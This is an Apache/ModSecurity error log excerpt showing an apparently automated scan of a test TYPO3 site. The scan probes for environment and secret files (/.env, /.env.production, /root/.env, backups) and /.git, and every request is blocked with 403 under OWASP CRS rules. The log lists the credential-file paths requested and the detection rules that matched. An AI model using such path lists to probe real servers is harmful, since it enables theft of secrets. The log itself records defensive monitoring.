[Fri Mar 20 15:01:16.278459 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.env"] [unique_id "ab1TLJJiwBXnNifSr5veqgAAAAQ"]
[Fri Mar 20 15:01:16.278546 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.env"] [unique_id "ab1TLJJiwBXnNifSr5veqgAAAAQ"]
[Fri Mar 20 15:01:16.278659 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/var/www/html/.env"] [unique_id "ab1TLJJiwBXnNifSr5veqgAAAAQ"]
[Fri Mar 20 15:01:16.285347 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /home/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/home/.env"] [unique_id "ab1TLPy1_WiwY9KfWu_4wQAAAAI"]
[Fri Mar 20 15:01:16.285443 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/home/.env"] [unique_id "ab1TLPy1_WiwY9KfWu_4wQAAAAI"]
[Fri Mar 20 15:01:16.285568 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/home/.env"] [unique_id "ab1TLPy1_WiwY9KfWu_4wQAAAAI"]
[Fri Mar 20 15:01:16.289724 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /root/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.env"] [unique_id "ab1TLP9i5ZHhQgdGB68gHwAAAAg"]
[Fri Mar 20 15:01:16.289818 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.env"] [unique_id "ab1TLP9i5ZHhQgdGB68gHwAAAAg"]
[Fri Mar 20 15:01:16.289932 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/root/.env"] [unique_id "ab1TLP9i5ZHhQgdGB68gHwAAAAg"]
[Fri Mar 20 15:01:16.290630 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_config"] [unique_id "ab1TLEnH70iMTzyPh3kWjwAAAAY"]
[Fri Mar 20 15:01:16.290738 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_config"] [unique_id "ab1TLEnH70iMTzyPh3kWjwAAAAY"]
[Fri Mar 20 15:01:16.290854 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_config"] [unique_id "ab1TLEnH70iMTzyPh3kWjwAAAAY"]
[Fri Mar 20 15:01:16.296968 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_secret"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_secret"] [unique_id "ab1TLG8zubx8zfwe9oW5OQAAAAU"]
[Fri Mar 20 15:01:16.297069 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_secret"] [unique_id "ab1TLG8zubx8zfwe9oW5OQAAAAU"]
[Fri Mar 20 15:01:16.297203 2026] [:error] [pid 2815734] [client 162.158.86.254:13014] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_secret"] [unique_id "ab1TLG8zubx8zfwe9oW5OQAAAAU"]
[Fri Mar 20 15:01:16.301334 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_settings"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_settings"] [unique_id "ab1TLKx8_pxqReT7SyGPGQAAAAM"]
[Fri Mar 20 15:01:16.301460 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_settings"] [unique_id "ab1TLKx8_pxqReT7SyGPGQAAAAM"]
[Fri Mar 20 15:01:16.301582 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_settings"] [unique_id "ab1TLKx8_pxqReT7SyGPGQAAAAM"]
[Fri Mar 20 15:01:16.302485 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1uAAAAAE"]
[Fri Mar 20 15:01:16.302623 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1uAAAAAE"]
[Fri Mar 20 15:01:16.302713 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1uAAAAAE"]
[Fri Mar 20 15:01:16.302834 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "ab1TLDQ9Th-2Y9b0JRd1uAAAAAE"]
[Fri Mar 20 15:01:17.866436 2026] [authz_core:error] [pid 2817640] [client 162.158.86.254:13016] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:17.884867 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab1TLUGu3yPOFBRkxZtwxgAAAAA"]
[Fri Mar 20 15:01:17.884999 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab1TLUGu3yPOFBRkxZtwxgAAAAA"]
[Fri Mar 20 15:01:17.885141 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab1TLUGu3yPOFBRkxZtwxgAAAAA"]
[Fri Mar 20 15:01:17.893648 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab1TLWLvrbuE12wYiLe4MQAAABA"]
[Fri Mar 20 15:01:17.893756 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab1TLWLvrbuE12wYiLe4MQAAABA"]
[Fri Mar 20 15:01:17.893879 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab1TLWLvrbuE12wYiLe4MQAAABA"]
[Fri Mar 20 15:01:17.909260 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab1TLfy1_WiwY9KfWu_4wgAAAAI"]
[Fri Mar 20 15:01:17.909393 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab1TLfy1_WiwY9KfWu_4wgAAAAI"]
[Fri Mar 20 15:01:17.909527 2026] [:error] [pid 2815711] [client 162.158.87.2:13658] [client 162.158.87.2] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab1TLfy1_WiwY9KfWu_4wgAAAAI"]
[Fri Mar 20 15:01:17.917503 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab1TLZJiwBXnNifSr5veqwAAAAQ"]
[Fri Mar 20 15:01:17.917629 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab1TLZJiwBXnNifSr5veqwAAAAQ"]
[Fri Mar 20 15:01:17.917774 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab1TLZJiwBXnNifSr5veqwAAAAQ"]
[Fri Mar 20 15:01:17.936246 2026] [authz_core:error] [pid 2817639] [client 162.158.86.143:11595] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:17.941468 2026] [authz_core:error] [pid 2816018] [client 162.158.86.254:13006] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Fri Mar 20 15:01:17.956452 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab1TLax8_pxqReT7SyGPGgAAAAM"]
[Fri Mar 20 15:01:17.956578 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab1TLax8_pxqReT7SyGPGgAAAAM"]
[Fri Mar 20 15:01:17.956716 2026] [:error] [pid 2815712] [client 162.158.86.142:13510] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab1TLax8_pxqReT7SyGPGgAAAAM"]
[Fri Mar 20 15:01:17.962250 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab1TLTQ9Th-2Y9b0JRd1uQAAAAE"]
[Fri Mar 20 15:01:17.962369 2026] [:error] [pid 2815710] [client 162.158.86.142:13503] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "ab1TLTQ9Th-2Y9b0JRd1uQAAAAE"]
